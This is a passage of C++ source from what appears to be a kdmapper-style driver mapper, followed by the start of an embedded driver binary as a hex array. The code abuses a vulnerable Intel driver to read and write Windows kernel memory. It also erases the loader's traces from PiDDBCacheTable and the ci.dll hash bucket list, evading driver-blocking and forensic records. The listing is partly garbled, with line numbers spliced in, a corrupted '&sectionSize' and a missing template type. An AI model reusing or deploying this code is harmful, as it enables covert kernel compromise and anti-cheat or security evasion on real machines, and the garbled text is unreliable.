	auto PiDDBLockPtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x8B\xD8\x85\xC0\x0F\x88\x00\x00\x00\x00\x65\x48\x8B\x04\x25\x00\x00\x00\x00\x66\xFF\x88\x00\x00\x00\x00\xB2\x01\x48\x8D\x0D\x00\x00\x00\x00\xE8\x00\x00\x00\x00\x4C\x8B\x00\x24", "xxxxxx????xxxxx????xxx????xxxxx????x????xx?x"); // 8B D8 85 C0 0F 88 ? ? ? ? 65 48 8B 04 25 ? ? ? ? 66 FF 88 ? ? ? ? B2 01 48 8D 0D ? ? ? ? E8 ? ? ? ? 4C 8B ? 24 update for build 22000.132
	auto PiDDBCacheTablePtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x66\x03\xD2\x48\x8D\x0D", "xxxxxx"); // 66 03 D2 48 8D 0D

	// Fallback chain for the lock: first pattern, then second, then third.
	// Each branch adds its own constant to the hit before it is resolved.
	if (PiDDBLockPtr == NULL) { // PiDDBLock pattern changes a lot from version 1607 of windows and we will need a second pattern if we want to keep simple as possible
		PiDDBLockPtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x48\x8B\x0D\x00\x00\x00\x00\x48\x85\xC9\x0F\x85\x00\x00\x00\x00\x48\x8D\x0D\x00\x00\x00\x00\xE8\x00\x00\x00\x00\xE8", "xxx????xxxxx????xxx????x????x"); // 48 8B 0D ? ? ? ? 48 85 C9 0F 85 ? ? ? ? 48 8D 0D ? ? ? ? E8 ? ? ? ? E8 build 22449+ (pattern can be improved but just fine for now)
		if (PiDDBLockPtr == NULL) {
			PiDDBLockPtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x8B\xD8\x85\xC0\x0F\x88\x00\x00\x00\x00\x65\x48\x8B\x04\x25\x00\x00\x00\x00\x48\x8D\x0D\x00\x00\x00\x00\xB2\x01\x66\xFF\x88\x00\x00\x00\x00\x90\xE8\x00\x00\x00\x00\x4C\x8B\x00\x24", "xxxxxx????xxxxx????xxx????xxxxx????xx????xx?x"); // 8B D8 85 C0 0F 88 ? ? ? ? 65 48 8B 04 25 ? ? ? ? 48 8D 0D ? ? ? ? B2 01 66 FF 88 ? ? ? ? 90 E8 ? ? ? ? 4C 8B ? 24 update for build 26100.1000
			if (PiDDBLockPtr == NULL) {
				Log(L"[-] Warning PiDDBLock not found" << std::endl);
				return false;
			}
			else {
				Log(L"[+] PiDDBLock found with third pattern" << std::endl);
				PiDDBLockPtr += 19;//third pattern offset
			}
		}
		else {
			Log(L"[+] PiDDBLock found with second pattern" << std::endl);
			PiDDBLockPtr += 16; //second pattern offset
		}
	}
	else {
		PiDDBLockPtr += 28; //first pattern offset
	}

	if (PiDDBCacheTablePtr == NULL) {
		PiDDBCacheTablePtr = FindPatternInSectionAtKernel(device_handle, "PAGE", intel_driver::ntoskrnlAddr, (PUCHAR)"\x48\x8B\xF9\x33\xC0\x48\x8D\x0D", "xxxxxxxx"); // 48 8B F9 33 C0 48 8D 0D
		if (PiDDBCacheTablePtr == NULL) {
			Log(L"[-] Warning PiDDBCacheTable not found" << std::endl);
			return false;
		}
		else {
			Log(L"[+] PiDDBCacheTable found with second pattern" << std::endl);
			PiDDBCacheTablePtr += 2;//second pattern offset
		}
	}

	Log("[+] PiDDBLock Ptr 0x" << std::hex << PiDDBLockPtr << std::endl);
	Log("[+] PiDDBCacheTable Ptr 0x" << std::hex << PiDDBCacheTablePtr << std::endl);

	// Displacement offset / instruction length pairs differ for the two
	// globals: (3, 7) for the lock and (6, 10) for the table.
	PVOID PiDDBLock = ResolveRelativeAddress(device_handle, (PVOID)PiDDBLockPtr, 3, 7);
	nt::PRTL_AVL_TABLE PiDDBCacheTable = (nt::PRTL_AVL_TABLE)ResolveRelativeAddress(device_handle, (PVOID)PiDDBCacheTablePtr, 6, 10);
#endif
	//context part is not used by lookup, lock or delete why we should use it?

	// From here until the matching release the kernel resource is held
	// exclusively by this call chain.
	if (!ExAcquireResourceExclusiveLite(device_handle, PiDDBLock, true)) {
		Log(L"[-] Can't lock PiDDBCacheTable" << std::endl);
		return false;
	}
	Log(L"[+] PiDDBLock Locked" << std::endl);

	auto n = GetDriverNameW();

	// search our entry in the table
	nt::PiDDBCacheEntry* pFoundEntry = (nt::PiDDBCacheEntry*)LookupEntry(device_handle, PiDDBCacheTable, iqvw64e_timestamp, n.c_str());
	if (pFoundEntry == nullptr) {
		Log(L"[-] Not found in cache" << std::endl);
		ExReleaseResourceLite(device_handle, PiDDBLock);
		return false;
	}

	// first, unlink from the list
	// pFoundEntry is a kernel address, so its List.Blink / List.Flink fields
	// are fetched with ReadMemory rather than dereferenced.
	PLIST_ENTRY prev;
	if (!ReadMemory(device_handle, (uintptr_t)pFoundEntry + (offsetof(struct nt::_PiDDBCacheEntry, List.Blink)), &prev, sizeof(_LIST_ENTRY*))) {
		Log(L"[-] Can't get prev entry" << std::endl);
		ExReleaseResourceLite(device_handle, PiDDBLock);
		return false;
	}
	PLIST_ENTRY next;
	if (!ReadMemory(device_handle, (uintptr_t)pFoundEntry + (offsetof(struct nt::_PiDDBCacheEntry, List.Flink)), &next, sizeof(_LIST_ENTRY*))) {
		Log(L"[-] Can't get next entry" << std::endl);
		ExReleaseResourceLite(device_handle, PiDDBLock);
		return false;
	}

	Log("[+] Found Table Entry = 0x" << std::hex << pFoundEntry << std::endl);

	// prev->Flink = next
	if (!WriteMemory(device_handle, (uintptr_t)prev + (offsetof(struct _LIST_ENTRY, Flink)), &next, sizeof(_LIST_ENTRY*))) {
		Log(L"[-] Can't set next entry" << std::endl);
		ExReleaseResourceLite(device_handle, PiDDBLock);
		return false;
	}
	// next->Blink = prev
	if (!WriteMemory(device_handle, (uintptr_t)next + (offsetof(struct _LIST_ENTRY, Blink)), &prev, sizeof(_LIST_ENTRY*))) {
		Log(L"[-] Can't set prev entry" << std::endl);
		ExReleaseResourceLite(device_handle, PiDDBLock);
		return false;
	}

	// then delete the element from the avl table
	if (!RtlDeleteElementGenericTableAvl(device_handle, PiDDBCacheTable, pFoundEntry)) {
		Log(L"[-] Can't delete from PiDDBCacheTable" << std::endl);
		ExReleaseResourceLite(device_handle, PiDDBLock);
		return false;
	}

	//Decrement delete count
	// The results of this read and write are not checked.
	ULONG cacheDeleteCount = 0;
	ReadMemory(device_handle, (uintptr_t)PiDDBCacheTable + (offsetof(struct nt::_RTL_AVL_TABLE, DeleteCount)), &cacheDeleteCount, sizeof(ULONG));
	if (cacheDeleteCount > 0) {
		cacheDeleteCount--;
		WriteMemory(device_handle, (uintptr_t)PiDDBCacheTable + (offsetof(struct nt::_RTL_AVL_TABLE, DeleteCount)), &cacheDeleteCount, sizeof(ULONG));
	}

	// release the ddb resource lock
	ExReleaseResourceLite(device_handle, PiDDBLock);

	Log(L"[+] PiDDBCacheTable Cleaned" << std::endl);

	return true;
}

// Searches a range of kernel memory for a masked byte pattern.
//
// Copies dwLen bytes starting at kernel address dwAddress into a user-mode
// buffer with ReadMemory, runs utils::FindPattern over the copy, and rebases
// the hit from the local buffer back to the kernel address range.
//
// dwAddress: kernel address of the range; 0 is rejected.
// dwLen:     size of the range in bytes; more than 1 GiB is rejected.
// bMask:     pattern bytes.
// szMask:    mask string passed through to utils::FindPattern.
// Returns the kernel address of the match, or 0 when nothing matched or the
// read failed.
// NOTE(review): the element type of the make_unique call is missing in this
// listing (it appears to have been lost when the page was extracted).
uintptr_t intel_driver::FindPatternAtKernel(HANDLE device_handle, uintptr_t dwAddress, uintptr_t dwLen, BYTE* bMask, const char* szMask) {
	if (!dwAddress) {
		Log(L"[-] No module address to find pattern" << std::endl);
		return 0;
	}

	if (dwLen > 1024 * 1024 * 1024) { //if read is > 1GB
		Log(L"[-] Can't find pattern, Too big section" << std::endl);
		return 0;
	}

	auto sectionData = std::make_unique(dwLen);
	if (!ReadMemory(device_handle, dwAddress, sectionData.get(), dwLen)) {
		Log(L"[-] Read failed in FindPatternAtKernel" << std::endl);
		return 0;
	}

	auto result = utils::FindPattern((uintptr_t)sectionData.get(), dwLen, bMask, szMask);

	if (result <= 0) {
		return 0;
	}
	// Translate the hit from the local copy to the kernel range.
	result = dwAddress - (uintptr_t)sectionData.get() + result;
	return result;
}

// Finds a named section of a kernel module.
//
// Reads the first 0x1000 bytes of the module at modulePtr into a local buffer,
// asks utils::FindSection for sectionName within those headers, and rebases
// the result to the module's kernel address. When `size` is non-null it
// receives the section size.
// Returns 0 for a null modulePtr, a failed read, or a section that was not
// found or has size 0.
uintptr_t intel_driver::FindSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, PULONG size) {
	if (!modulePtr)
		return 0;
	BYTE 
headers[0x1000]; 1082 | if (!ReadMemory(device_handle, modulePtr, headers, 0x1000)) { 1083 | Log(L"[-] Can't read module headers" << std::endl); 1084 | return 0; 1085 | } 1086 | ULONG sectionSize = 0; 1087 | uintptr_t section = (uintptr_t)utils::FindSection(sectionName, (uintptr_t)headers, §ionSize); 1088 | if (!section || !sectionSize) { 1089 | Log(L"[-] Can't find section" << std::endl); 1090 | return 0; 1091 | } 1092 | if (size) 1093 | *size = sectionSize; 1094 | return section - (uintptr_t)headers + modulePtr; 1095 | } 1096 | 1097 | uintptr_t intel_driver::FindPatternInSectionAtKernel(HANDLE device_handle, const char* sectionName, uintptr_t modulePtr, BYTE* bMask, const char* szMask) { 1098 | ULONG sectionSize = 0; 1099 | uintptr_t section = FindSectionAtKernel(device_handle, sectionName, modulePtr, §ionSize); 1100 | return FindPatternAtKernel(device_handle, section, sectionSize, bMask, szMask); 1101 | } 1102 | 1103 | bool intel_driver::ClearKernelHashBucketList(HANDLE device_handle) { 1104 | uint64_t ci = utils::GetKernelModuleAddress("ci.dll"); 1105 | if (!ci) { 1106 | Log(L"[-] Can't Find ci.dll module address" << std::endl); 1107 | return false; 1108 | } 1109 | 1110 | //Thanks @KDIo3 and @Swiftik from UnknownCheats 1111 | #ifdef PDB_OFFSETS 1112 | auto g_KernelHashBucketListOffset = KDSymbolsHandler::GetInstance()->GetOffset(L"g_KernelHashBucketList"); 1113 | if (!g_KernelHashBucketListOffset) 1114 | { 1115 | Log(L"[-] Can't Find g_KernelHashBucketList Offset" << std::endl); 1116 | return false; 1117 | } 1118 | 1119 | auto g_HashCacheLockOffset = KDSymbolsHandler::GetInstance()->GetOffset(L"g_HashCacheLock"); 1120 | if (!g_KernelHashBucketListOffset) 1121 | { 1122 | Log(L"[-] Can't Find g_HashCacheLock Offset" << std::endl); 1123 | return false; 1124 | } 1125 | 1126 | PVOID g_KernelHashBucketList = (PVOID)(ci + g_KernelHashBucketListOffset); 1127 | PVOID g_HashCacheLock = (PVOID)(ci + g_HashCacheLockOffset); 1128 | #else 1129 | auto sig = 
FindPatternInSectionAtKernel(device_handle, "PAGE", ci, PUCHAR("\x48\x8B\x1D\x00\x00\x00\x00\xEB\x00\xF7\x43\x40\x00\x20\x00\x00"), "xxx????x?xxxxxxx"); 1130 | if (!sig) { 1131 | Log(L"[-] Can't Find g_KernelHashBucketList" << std::endl); 1132 | return false; 1133 | } 1134 | auto sig2 = FindPatternAtKernel(device_handle, (uintptr_t)sig - 50, 50, PUCHAR("\x48\x8D\x0D"), "xxx"); 1135 | if (!sig2) { 1136 | Log(L"[-] Can't Find g_HashCacheLock" << std::endl); 1137 | return false; 1138 | } 1139 | const auto g_KernelHashBucketList = ResolveRelativeAddress(device_handle, (PVOID)sig, 3, 7); 1140 | const auto g_HashCacheLock = ResolveRelativeAddress(device_handle, (PVOID)sig2, 3, 7); 1141 | if (!g_KernelHashBucketList || !g_HashCacheLock) 1142 | { 1143 | Log(L"[-] Can't Find g_HashCache relative address" << std::endl); 1144 | return false; 1145 | } 1146 | #endif 1147 | 1148 | Log(L"[+] g_KernelHashBucketList Found 0x" << std::hex << g_KernelHashBucketList << std::endl); 1149 | 1150 | if (!ExAcquireResourceExclusiveLite(device_handle, g_HashCacheLock, true)) { 1151 | Log(L"[-] Can't lock g_HashCacheLock" << std::endl); 1152 | return false; 1153 | } 1154 | Log(L"[+] g_HashCacheLock Locked" << std::endl); 1155 | 1156 | nt::HashBucketEntry* prev = (nt::HashBucketEntry*)g_KernelHashBucketList; 1157 | nt::HashBucketEntry* entry = 0; 1158 | if (!ReadMemory(device_handle, (uintptr_t)prev, &entry, sizeof(entry))) { 1159 | Log(L"[-] Failed to read first g_KernelHashBucketList entry!" << std::endl); 1160 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1161 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1162 | } 1163 | return false; 1164 | } 1165 | if (!entry) { 1166 | Log(L"[!] g_KernelHashBucketList looks empty!" << std::endl); 1167 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1168 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" 
<< std::endl); 1169 | } 1170 | return true; 1171 | } 1172 | 1173 | std::wstring wdname = GetDriverNameW(); 1174 | std::wstring search_path = GetDriverPath(); 1175 | SIZE_T expected_len = (search_path.length() - 2) * 2; 1176 | 1177 | while (entry) { 1178 | 1179 | USHORT wsNameLen = 0; 1180 | if (!ReadMemory(device_handle, (uintptr_t)entry + offsetof(nt::HashBucketEntry, DriverName.Length), &wsNameLen, sizeof(wsNameLen)) || wsNameLen == 0) { 1181 | Log(L"[-] Failed to read g_KernelHashBucketList entry text len!" << std::endl); 1182 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1183 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1184 | } 1185 | return false; 1186 | } 1187 | 1188 | if (expected_len == wsNameLen) { 1189 | wchar_t* wsNamePtr = 0; 1190 | if (!ReadMemory(device_handle, (uintptr_t)entry + offsetof(nt::HashBucketEntry, DriverName.Buffer), &wsNamePtr, sizeof(wsNamePtr)) || !wsNamePtr) { 1191 | Log(L"[-] Failed to read g_KernelHashBucketList entry text ptr!" << std::endl); 1192 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1193 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1194 | } 1195 | return false; 1196 | } 1197 | 1198 | auto wsName = std::make_unique((ULONG64)wsNameLen / 2ULL + 1ULL); 1199 | if (!ReadMemory(device_handle, (uintptr_t)wsNamePtr, wsName.get(), wsNameLen)) { 1200 | Log(L"[-] Failed to read g_KernelHashBucketList entry text!" << std::endl); 1201 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1202 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" 
<< std::endl); 1203 | } 1204 | return false; 1205 | } 1206 | 1207 | size_t find_result = std::wstring(wsName.get()).find(wdname); 1208 | if (find_result != std::wstring::npos) { 1209 | Log(L"[+] Found In g_KernelHashBucketList: " << std::wstring(&wsName[find_result]) << std::endl); 1210 | nt::HashBucketEntry* Next = 0; 1211 | if (!ReadMemory(device_handle, (uintptr_t)entry, &Next, sizeof(Next))) { 1212 | Log(L"[-] Failed to read g_KernelHashBucketList next entry ptr!" << std::endl); 1213 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1214 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1215 | } 1216 | return false; 1217 | } 1218 | 1219 | if (!WriteMemory(device_handle, (uintptr_t)prev, &Next, sizeof(Next))) { 1220 | Log(L"[-] Failed to write g_KernelHashBucketList prev entry ptr!" << std::endl); 1221 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1222 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1223 | } 1224 | return false; 1225 | } 1226 | 1227 | if (!FreePool(device_handle, (uintptr_t)entry)) { 1228 | Log(L"[-] Failed to clear g_KernelHashBucketList entry pool!" << std::endl); 1229 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1230 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1231 | } 1232 | return false; 1233 | } 1234 | Log(L"[+] g_KernelHashBucketList Cleaned" << std::endl); 1235 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1236 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1237 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1238 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" 
<< std::endl); 1239 | } 1240 | return false; 1241 | } 1242 | return true; 1243 | } 1244 | } 1245 | prev = entry; 1246 | //read next 1247 | if (!ReadMemory(device_handle, (uintptr_t)entry, &entry, sizeof(entry))) { 1248 | Log(L"[-] Failed to read g_KernelHashBucketList next entry!" << std::endl); 1249 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1250 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1251 | } 1252 | return false; 1253 | } 1254 | } 1255 | 1256 | if (!ExReleaseResourceLite(device_handle, g_HashCacheLock)) { 1257 | Log(L"[-] Failed to release g_KernelHashBucketList lock!" << std::endl); 1258 | } 1259 | return false; 1260 | } 1261 | -------------------------------------------------------------------------------- /raw_driver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // RickOwens00 4 | inline unsigned char rawData[11000] = { 5 | 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 6 | 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 7 | 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 8 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 9 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 10 | 0xD0, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, 11 | 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, 12 | 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F, 13 | 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, 14 | 0x44, 0x4F, 0x53, 0x20, 0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, 15 | 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2D, 0xC4, 0x5D, 0x16, 16 | 0x69, 0xA5, 0x33, 0x45, 0x69, 0xA5, 0x33, 0x45, 0x69, 0xA5, 0x33, 0x45, 17 | 0x1D, 0x24, 0x30, 0x44, 0x6D, 0xA5, 0x33, 0x45, 0x1D, 0x24, 0x37, 0x44, 18 | 0x6C, 0xA5, 0x33, 0x45, 0x1D, 0x24, 0x32, 
0x44, 0x6A, 0xA5, 0x33, 0x45, 19 | 0x69, 0xA5, 0x32, 0x45, 0x66, 0xA5, 0x33, 0x45, 0x93, 0x22, 0x36, 0x44, 20 | 0x68, 0xA5, 0x33, 0x45, 0x93, 0x22, 0x31, 0x44, 0x68, 0xA5, 0x33, 0x45, 21 | 0x52, 0x69, 0x63, 0x68, 0x69, 0xA5, 0x33, 0x45, 0x00, 0x00, 0x00, 0x00, 22 | 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x64, 0x86, 0x06, 0x00, 23 | 0x19, 0xD2, 0x07, 0x68, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 24 | 0xF0, 0x00, 0x22, 0x00, 0x0B, 0x02, 0x0E, 0x2B, 0x00, 0x14, 0x00, 0x00, 25 | 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 26 | 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x01, 0x00, 0x00, 0x00, 27 | 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 28 | 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 29 | 0x00, 0x70, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x4B, 0x4F, 0x00, 0x00, 30 | 0x01, 0x00, 0x60, 0x41, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 31 | 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 32 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 33 | 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 34 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, 35 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 36 | 0xE4, 0x00, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0xF8, 0x06, 0x00, 0x00, 37 | 0x00, 0x60, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x10, 0x22, 0x00, 0x00, 38 | 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 39 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 40 | 0x00, 0x00, 0x00, 0x00, 0xD0, 0x20, 0x00, 0x00, 0x40, 0x01, 0x00, 0x00, 41 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 42 | 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 43 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 44 | 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 
0x65, 0x78, 0x74, 0x00, 0x00, 0x00, 45 | 0x38, 0x0E, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 46 | 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 47 | 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x68, 0x2E, 0x72, 0x64, 0x61, 48 | 0x74, 0x61, 0x00, 0x00, 0x18, 0x05, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 49 | 0x00, 0x06, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 50 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 51 | 0x2E, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x58, 0x00, 0x00, 0x00, 52 | 0x00, 0x30, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x1A, 0x00, 0x00, 53 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 54 | 0x40, 0x00, 0x00, 0xC8, 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 55 | 0xE4, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 56 | 0x00, 0x1C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 57 | 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 0x49, 0x4E, 0x49, 0x54, 58 | 0x00, 0x00, 0x00, 0x00, 0x04, 0x02, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 59 | 0x00, 0x04, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 60 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x62, 61 | 0x2E, 0x72, 0x65, 0x6C, 0x6F, 0x63, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 62 | 0x00, 0x60, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x22, 0x00, 0x00, 63 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 64 | 0x40, 0x00, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 65 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 66 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 67 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 68 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 69 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 70 | 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 71 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 72 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 73 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 74 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 75 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 76 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 77 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 78 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 79 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 80 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 81 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 82 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 83 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 84 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 85 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 86 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 87 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 88 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 89 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 90 | 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xEC, 0x38, 0x0F, 0x57, 0xC0, 0x48, 91 | 0x8D, 0x15, 0x02, 0x0E, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0x0F, 92 | 0x11, 0x44, 0x24, 0x20, 0xFF, 0x15, 0xE2, 0x0F, 0x00, 0x00, 0x48, 0x8D, 93 | 0x15, 0x3B, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xFF, 0x15, 94 | 0x28, 0x10, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x38, 0xC3, 0xCC, 0xCC, 0xCC, 95 | 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0x40, 0x53, 0x48, 0x83, 96 | 0xEC, 0x20, 0x48, 0x8B, 
